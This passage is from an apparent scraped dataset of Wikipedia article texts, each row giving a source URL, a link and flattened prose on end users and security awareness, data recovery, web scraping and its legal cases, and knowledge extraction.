users to help them understand and properly use a certain product or service. Due to the fact that the information available is usually very vast, inconsistent or ambiguous (e.g., a user manual with hundreds of pages, including guidance on using advanced features), many users suffer from an information overload. Therefore, they become unable to take the right course of action. This needs to be kept in mind when developing products and services and the necessary documentation for them. 14 Well-written documentation is needed for a user to reference. Some key aspects of such a documentation are: 13 At times users do not refer to the documentation available to them due to various reasons, ranging from finding the manual too large or due to not understanding the jargon and acronyms it contains. In other cases, the users may find that the manual makes too many assumptions about a user having pre-existing knowledge of computers and software, and thus the directions may skip over these initial steps (from the users' point of view). Thus, frustrated user may report false problems because of their inability to understand the software or computer hardware. This in turn causes the company to focus on perceived problems instead of focusing on the actual problems of the software. 15 In the 2010s, there is a lot of emphasis on user's security and privacy. With the increasing role that computers are playing in people's lives, people are carrying laptops and smartphones with them and using them for scheduling appointments, making online purchases using credit cards and searching for information. These activities can potentially be observed by companies, governments or individuals, which can lead to breaches of privacy, identity theft, by, blackmailing and other serious concerns. As well, many businesses, ranging from small business startups to huge corporations are using computers and software to design, manufacture, market and sell their products and services, and businesses also use computers and software in their back office processes (e.g., human resources, payroll, etc.). As such, it is important for people and organizations to need know that the information and data they are storing, using, or sending over computer networks or storing on computer systems is secure. However, developers of software and hardware are faced with many challenges in developing a system that can be both user friendly, accessible 24 7 on almost any device and be truly secure. Security leaks happen, even to individuals and organizations that have security measures in place to protect their data and information (e.g., firewalls, encryption, strong passwords). The complexities of creating such a secure system come from the fact that the behaviour of humans is not always rational or predictable. Even in a very-well secured computer system, a malicious individual can telephone a worker and pretend to be a private investigator working for the software company, and ask for the individual's password, a dishonest process called phishing. As well, even with a well-secured system, if a worker decides to put the company's electronic files on a USB drive to take them home to work on them over the weekend (against many companies' policies), and then loses this USB drive, the company's data may be compromised. Therefore, developers need to make systems that are intuitive to the user in order to have information security and system security. 16 Another key step to end user security is informing the people and employees about the security threats and what they can do to avoid them or protect themselves and the organization. Clearly underlining, the capabilities and risks makes users more aware and informed whilst they are using the products. Some situations that could put the user at risk are: Even if the security measures in place are strong, the choices the user makes and his her behavior have a major impact on how secure their information really is. Therefore, an informed user is one who can protect and achieve the best security out of the system they use. 17 Because of the importance of end-user security and the impact it can have on organizations the UK government set out a guidance for the public sector, to help civil servants learn how to be more security aware when using government networks and computers. While this is targeted to a certain sector, this type of educational effort can be informative to any type of user. This helps developers meet security norms and end users be aware of the risks involved. 18 Reimers and Andersson have conducted a number of studies on end-user security habits and found that the same type of repeated education training in security best practices can have a marked effect on the perception of compliance with good end-user network security habits, especially concerning malware and ransomware. 19 In end-user license agreements, the end user is distinguished from the value-added reseller, who installs the software or the organization that purchases and manages the software. 20 failed verification Certain American defense-related products and information require export approval from the United States Government under the International Traffic in Arms Regulations and Export Administration Regulations. 21 In order to obtain a license to export, the exporter must specify both the end user and the end use for undertaking an end-user certificate. 22 In the UK, there exist documents that accompany licenses for products named in the end user undertaking statements. clarification needed 23 |
657 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Special:CreateAccount&returnto=Web+scraping | edits articles recent contributors |
658 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_recovery | In computing, data recovery is a process of retrieving deleted, inaccessible, lost, corrupted, damaged, or formatted data from secondary storage, removable media or files, when the data stored in them cannot be accessed in a usual way. 1 The data is most often salvaged from storage media such as internal or external hard disk drives (HDDs), solid-state drives (SSDs), USB flash drives, magnetic tapes, CDs, DVDs, RAID subsystems, and other electronic devices. Recovery may be required due to physical damage to the storage devices or logical damage to the file system that prevents it from being mounted by the host operating system (OS). 2 Logical failures occur when the hard drive devices are functional but the user or automated-OS cannot retrieve or access data stored on them. Logical failures can occur due to corruption of the engineering chip, lost partitions, firmware failure, or failures during formatting re-installation. 3 4 Data recovery can be a very simple or technical challenge. This is why there are specific software companies specialized in this field. 5 The most common data recovery scenarios involve an operating system failure, malfunction of a storage device, logical failure of storage devices, accidental damage or deletion, etc. (typically, on a single-drive, single-partition, single-OS system), in which case the ultimate goal is simply to copy all important files from the damaged media to another new drive. This can be accomplished using a Live CD, or DVD by booting directly from a ROM or a USB drive instead of the corrupted drive in question. Many Live CDs or DVDs provide a means to mount the system drive and backup drives or removable media, and to move the files from the system drive to the backup media with a file manager or optical disc authoring software. Such cases can often be mitigated by disk partitioning and consistently storing valuable data files (or copies of them) on a different partition from the replaceable OS system files. Another scenario involves a drive-level failure, such as a compromised file system or drive partition, or a hard disk drive failure. In any of these cases, the data is not easily read from the media devices. Depending on the situation, solutions involve repairing the logical file system, partition table, or master boot record, or updating the firmware or drive recovery techniques ranging from software-based recovery of corrupted data, to hardware- and software-based recovery of damaged service areas (also known as the hard disk drive's "firmware"), to hardware replacement on a physically damaged drive which allows for the extraction of data to a new drive. If a drive recovery is necessary, the drive itself has typically failed permanently, and the focus is rather on a one-time recovery, salvaging whatever data can be read. In a third scenario, files have been accidentally "deleted" from a storage medium by the users. Typically, the contents of deleted files are not removed immediately from the physical drive; instead, references to them in the directory structure are removed, and thereafter space the deleted data occupy is made available for later data overwriting. In the mind of end users, deleted files cannot be discoverable through a standard file manager, but the deleted data still technically exists on the physical drive. In the meantime, the original file contents remain, often several disconnected fragments, and may be recoverable if not overwritten by other data files. The term "data recovery" is also used in the context of forensic applications or espionage, where data which have been encrypted, hidden, or deleted, rather than damaged, are recovered. Sometimes data present in the computer gets encrypted or hidden due to reasons like virus attacks which can only be recovered by some computer forensic experts. A wide variety of failures can cause physical damage to storage media, which may result from human errors and natural disasters. CD-ROMs can have their metallic substrate or dye layer scratched off; hard disks can suffer from a multitude of mechanical failures, such as head crashes, PCB failure, and failed motors; tapes can simply break. Physical damage to a hard drive, even in cases where a head crash has occurred, does not necessarily mean there will be a permanent loss of data. The techniques employed by many professional data recovery companies can typically salvage most, if not all, of the data that had been lost when the failure occurred. Of course, there are exceptions to this, such as cases where severe damage to the hard drive platters may have occurred. However, if the hard drive can be repaired and a full image or clone created, then the logical file structure can be rebuilt in most instances. Most physical damage cannot be repaired by end users. For example, opening a hard disk drive in a normal environment can allow airborne dust to settle on the platter and become caught between the platter and the read write head. During normal operation, read write heads float 3 to 6 nanometers above the platter surface, and the average dust particles found in a normal environment are typically around 30,000 nanometers in diameter. 6 When these dust particles get caught between the read write heads and the platter, they can cause new head crashes that further damage the platter and thus compromise the recovery process. Furthermore, end users generally do not have the hardware or technical expertise required to make these repairs. Consequently, data recovery companies are often employed to salvage important data with the more reputable ones using class 100 dust- and static-free cleanrooms. 7 Recovering data from physically damaged hardware can involve multiple techniques. Some damage can be repaired by replacing parts in the hard disk. This alone may make the disk usable, but there may still be logical damage. A specialized disk-imaging procedure is used to recover every readable bit from the surface. Once this image is acquired and saved on a reliable medium, the image can be safely analyzed for logical damage and will possibly allow much of the original file system to be reconstructed. A common misconception is that a damaged printed circuit board (PCB) may be simply replaced during recovery procedures by an identical PCB from a healthy drive. While this may work in rare circumstances on hard disk drives manufactured before 2003, it will not work on newer drives. Electronics boards of modern drives usually contain drive-specific adaptation data (generally a map of bad sectors and tuning parameters) and other information required to properly access data on the drive. Replacement boards often need this information to effectively recover all of the data. The replacement board may need to be reprogrammed. Some manufacturers (Seagate, for example) store this information on a serial EEPROM chip, which can be removed and transferred to the replacement board. 8 9 Each hard disk drive has what is called a system area or service area; this portion of the drive, which is not directly accessible to the end user, usually contains drive's firmware and adaptive data that helps the drive operate within normal parameters. 10 One function of the system area is to log defective sectors within the drive; essentially telling the drive where it can and cannot write data. The sector lists are also stored on various chips attached to the PCB, and they are unique to each hard disk drive. If the data on the PCB do not match what is stored on the platter, then the drive will not calibrate properly. 11 In most cases the drive heads will click because they are unable to find the data matching what is stored on the PCB. The term "logical damage" refers to situations in which the error is not a problem in the hardware and requires software-level solutions. In some cases, data on a hard disk drive can be unreadable due to damage to the partition table or file system, or to (intermittent) media errors. In the majority of these cases, at least a portion of the original data can be recovered by repairing the damaged partition table or file system using specialized data recovery software such as Testdisk; software like ddrescue can image media despite intermittent errors, and image raw data when there is partition table or file system damage. This type of data recovery can be performed by people without expertise in drive hardware as it requires no special physical equipment or access to platters. Sometimes data can be recovered using relatively simple methods and tools; 12 more serious cases can require expert intervention, particularly if parts of files are irrecoverable. Data carving is the recovery of parts of damaged files using knowledge of their structure. After data has been physically overwritten on a hard disk drive, it is generally assumed that the previous data are no longer possible to recover. In 1996, Peter Gutmann, a computer scientist, presented a paper that suggested overwritten data could be recovered through the use of magnetic force microscopy. 13 In 2001, he presented another paper on a similar topic. 14 To guard against this type of data recovery, Gutmann and Colin Plumb designed a method of irreversibly scrubbing data, known as the Gutmann method and used by several disk-scrubbing software packages. Substantial criticism has followed, primarily dealing with the lack of any concrete examples of significant amounts of overwritten data being recovered. 15 Although Gutmann's theory may be correct, there is no practical evidence that overwritten data can be recovered, while research has shown to support that overwritten data cannot be recovered. specify 16 17 18 Solid-state drives (SSD) overwrite data differently from hard disk drives (HDD) which makes at least some of their data easier to recover. Most SSDs use flash memory to store data in pages and blocks, referenced by logical block addresses (LBA) which are managed by the flash translation layer (FTL). When the FTL modifies a sector it writes the new data to another location and updates the map so the new data appear at the target LBA. This leaves the pre-modification data in place, with possibly many generations, and recoverable by data recovery software. Sometimes, data present in the physical drives (Internal External Hard disk, Pen Drive, etc.) gets lost, deleted and formatted due to circumstances like virus attack, accidental deletion or accidental use of SHIFT DELETE. In these cases, data recovery software is used to recover restore the data files. In the list of logical failures of hard disks, a logical bad sector is the most common fault leading data not to be readable. Sometimes it is possible to sidestep error detection even in software, and perhaps with repeated reading and statistical analysis recover at least some of the underlying stored data. Sometimes prior knowledge of the data stored and the error detection and correction codes can be used to recover even erroneous data. However, if the underlying physical drive is degraded badly enough, at least the hardware surrounding the data must be replaced, or it might even be necessary to apply laboratory techniques to the physical recording medium. Each of the approaches is progressively more expensive, and as such progressively more rarely sought. Eventually, if the final, physical storage medium has indeed been disturbed badly enough, recovery will not be possible using any means; the information has irreversibly been lost. Recovery experts do not always need to have physical access to the damaged hardware. When the lost data can be recovered by software techniques, they can often perform the recovery using remote access software over the Internet, LAN or other connection to the physical location of the damaged media. The process is essentially no different from what the end user could perform by themselves. 19 Remote recovery requires a stable connection with an adequate bandwidth. However, it is not applicable where access to the hardware is required, as in cases of physical damage. Usually, there are four phases when it comes to successful data recovery, though that can vary depending on the type of data corruption and recovery required. 20 The Windows operating system can be reinstalled on a computer that is already licensed for it. The reinstallation can be done by downloading the operating system or by using a "restore disk" provided by the computer manufacturer. Eric Lundgren was fined and sentenced to U.S. federal prison in April 2018 for producing 28,000 restore disks and intending to distribute them for about 25 cents each as a convenience to computer repair shops. 21 Data recovery cannot always be done on a running system. As a result, a boot disk, live CD, live USB, or any other type of live distro contains a minimal operating system. |
659 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-22 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
660 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Knowledge_extraction | Knowledge extraction is the creation of knowledge from structured (relational databases, XML) and unstructured (text, documents, images) sources. The resulting knowledge needs to be in a machine-readable and machine-interpretable format and must represent knowledge in a manner that facilitates inferencing. Although it is methodically similar to information extraction (NLP) and ETL (data warehouse), the main criterion is that the extraction result goes beyond the creation of structured information or the transformation into a relational schema. It requires either the reuse of existing formal knowledge (reusing identifiers or ontologies) or the generation of a schema based on the source data. The RDB2RDF W3C group 1 is currently standardizing a language for extraction of resource description frameworks (RDF) from relational databases. Another popular example for knowledge extraction is the transformation of Wikipedia into structured data and also the mapping to existing knowledge (see DBpedia and Freebase). After the standardization of knowledge representation languages such as RDF and OWL, much research has been conducted in the area, especially regarding transforming relational databases into RDF, identity resolution, knowledge discovery and ontology learning. The general process uses traditional methods from information extraction and extract, transform, and load (ETL), which transform the data from the sources into structured formats. The following criteria can be used to categorize approaches in this topic (some of them only account for extraction from relational databases): 2 President Obama called Wednesday on Congress to extend a tax break for students included in last year's economic stimulus package, arguing that the policy provides more generous assistance. When building a RDB representation of a problem domain, the starting point is frequently an entity-relationship diagram (ERD). Typically, each entity is represented as a database table, each attribute of the entity becomes a column in that table, and relationships between entities are indicated by foreign keys. Each table typically defines a particular class of entity, each column one of its attributes. Each row in the table describes an entity instance, uniquely identified by a primary key. The table rows collectively describe an entity set. In an equivalent RDF representation of the same entity set: So, to render an equivalent view based on RDF semantics, the basic mapping algorithm would be as follows: Early mentioning of this basic or direct mapping can be found in Tim Berners-Lee's comparison of the ER model to the RDF model. 4 The 1:1 mapping mentioned above exposes the legacy data as RDF in a straightforward way, additional refinements can be employed to improve the usefulness of RDF output respective the given Use Cases. Normally, information is lost during the transformation of an entity-relationship diagram (ERD) to relational tables (Details can be found in object-relational impedance mismatch) and has to be reverse engineered. From a conceptual view, approaches for extraction can come from two directions. The first direction tries to extract or learn an OWL schema from the given database schema. Early approaches used a fixed amount of manually created mapping rules to refine the 1:1 mapping. 5 6 7 More elaborate methods are employing heuristics or learning algorithms to induce schematic information (methods overlap with ontology learning). While some approaches try to extract the information from the structure inherent in the SQL schema 8 (analysing e.g. foreign keys), others analyse the content and the values in the tables to create conceptual hierarchies 9 (e.g. a columns with few values are candidates for becoming categories). The second direction tries to map the schema and its contents to a pre-existing domain ontology (see also: ontology alignment). Often, however, a suitable domain ontology does not exist and has to be created first. As XML is structured as a tree, any data can be easily represented in RDF, which is structured as a graph. XML2RDF is one example of an approach that uses RDF blank nodes and transforms XML elements and attributes to RDF properties. The topic however is more complex as in the case of relational databases. In a relational table the primary key is an ideal candidate for becoming the subject of the extracted triples. An XML element, however, can be transformed - depending on the context- as a subject, a predicate or object of a triple. XSLT can be used a standard transformation language to manually convert XML to RDF. The largest portion of information contained in business documents (about 80% 10 ) is encoded in natural language and therefore unstructured. Because unstructured data is rather a challenge for knowledge extraction, more sophisticated methods are required, which generally tend to supply worse results compared to structured data. The potential for a massive acquisition of extracted knowledge, however, should compensate the increased complexity and decreased quality of extraction. In the following, natural language sources are understood as sources of information, where the data is given in an unstructured fashion as plain text. If the given text is additionally embedded in a markup document (e. g. HTML document), the mentioned systems normally remove the markup elements automatically. As a preprocessing step to knowledge extraction, it can be necessary to perform linguistic annotation by one or multiple NLP tools. Individual modules in an NLP workflow normally build on tool-specific formats for input and output, but in the context of knowledge extraction, structured formats for representing linguistic annotations have been applied. Typical NLP tasks relevant to knowledge extraction include: In NLP, such data is typically represented in TSV formats (CSV formats with TAB as separators), often referred to as CoNLL formats. For knowledge extraction workflows, RDF views on such data have been created in accordance with the following community standards: Other, platform-specific formats include Traditional information extraction 20 is a technology of natural language processing, which extracts information from typically natural language texts and structures these in a suitable manner. The kinds of information to be identified must be specified in a model before beginning the process, which is why the whole process of traditional Information Extraction is domain dependent. The IE is split in the following five subtasks. The task of named entity recognition is to recognize and to categorize all named entities contained in a text (assignment of a named entity to a predefined category). This works by application of grammar based methods or statistical models. Coreference resolution identifies equivalent entities, which were recognized by NER, within a text. There are two relevant kinds of equivalence relationship. The first one relates to the relationship between two different represented entities (e.g. IBM Europe and IBM) and the second one to the relationship between an entity and their anaphoric references (e.g. it and IBM). Both kinds can be recognized by coreference resolution. During template element construction the IE system identifies descriptive properties of entities, recognized by NER and CO. These properties correspond to ordinary qualities like red or big. Template relation construction identifies relations, which exist between the template elements. These relations can be of several kinds, such as works-for or located-in, with the restriction, that both domain and range correspond to entities. In the template scenario production events, which are described in the text, will be identified and structured with respect to the entities, recognized by NER and CO and relations, identified by TR. Ontology-based information extraction 10 is a subfield of information extraction, with which at least one ontology is used to guide the process of information extraction from natural language text. The OBIE system uses methods of traditional information extraction to identify concepts, instances and relations of the used ontologies in the text, which will be structured to an ontology after the process. Thus, the input ontologies constitute the model of information to be extracted. 21 Ontology learning is the automatic or semi-automatic creation of ontologies, including extracting the corresponding domain's terms from natural language text. As building ontologies manually is extremely labor-intensive and time consuming, there is great motivation to automate the process. During semantic annotation, 22 natural language text is augmented with metadata (often represented in RDFa), which should make the semantics of contained terms machine-understandable. At this process, which is generally semi-automatic, knowledge is extracted in the sense, that a link between lexical terms and for example concepts from ontologies is established. Thus, knowledge is gained, which meaning of a term in the processed context was intended and therefore the meaning of the text is grounded in machine-readable data with the ability to draw inferences. Semantic annotation is typically split into the following two subtasks. At the terminology extraction level, lexical terms from the text are extracted. For this purpose a tokenizer determines at first the word boundaries and solves abbreviations. Afterwards terms from the text, which correspond to a concept, are extracted with the help of a domain-specific lexicon to link these at entity linking. In entity linking 23 a link between the extracted lexical terms from the source text and the concepts from an ontology or knowledge base such as DBpedia is established. For this, candidate-concepts are detected appropriately to the several meanings of a term with the help of a lexicon. Finally, the context of the terms is analyzed to determine the most appropriate disambiguation and to assign the term to the correct concept. Note that "semantic annotation" in the context of knowledge extraction is not to be confused with semantic parsing as understood in natural language processing (also referred to as "semantic annotation"): Semantic parsing aims a complete, machine-readable representation of natural language, whereas semantic annotation in the sense of knowledge extraction tackles only a very elementary aspect of that. The following criteria can be used to categorize tools, which extract knowledge from natural language text. The following table characterizes some tools for Knowledge Extraction from natural language sources. Knowledge discovery describes the process of automatically searching large volumes of data for patterns that can be considered knowledge about the data. 44 It is often described as deriving knowledge from the input data. Knowledge discovery developed out of the data mining domain, and is closely related to it both in terms of methodology and terminology. 45 The most well-known branch of data mining is knowledge discovery, also known as knowledge discovery in databases (KDD). Just as many other forms of knowledge discovery it creates abstractions of the input data. The knowledge obtained through the process may become additional data that can be used for further usage and discovery. Often the outcomes from knowledge discovery are not actionable, actionable knowledge discovery, also known as domain driven data mining, 46 aims to discover and deliver actionable knowledge and insights. Another promising application of knowledge discovery is in the area of software modernization, weakness discovery and compliance which involves understanding existing software artifacts. This process is related to a concept of reverse engineering. Usually the knowledge obtained from existing software is presented in the form of models to which specific queries can be made when necessary. An entity relationship is a frequent format of representing knowledge obtained from existing software. Object Management Group (OMG) developed the specification Knowledge Discovery Metamodel (KDM) which defines an ontology for the software assets and their relationships for the purpose of performing knowledge discovery in existing code. Knowledge discovery from existing software systems, also known as software mining is closely related to data mining, since existing software artifacts contain enormous value for risk management and business value, key for the evaluation and evolution of software systems. Instead of mining individual data sets, software mining focuses on metadata, such as process flows (e.g. data flows, control flows, call maps), architecture, database schemas, and business rules terms process. |
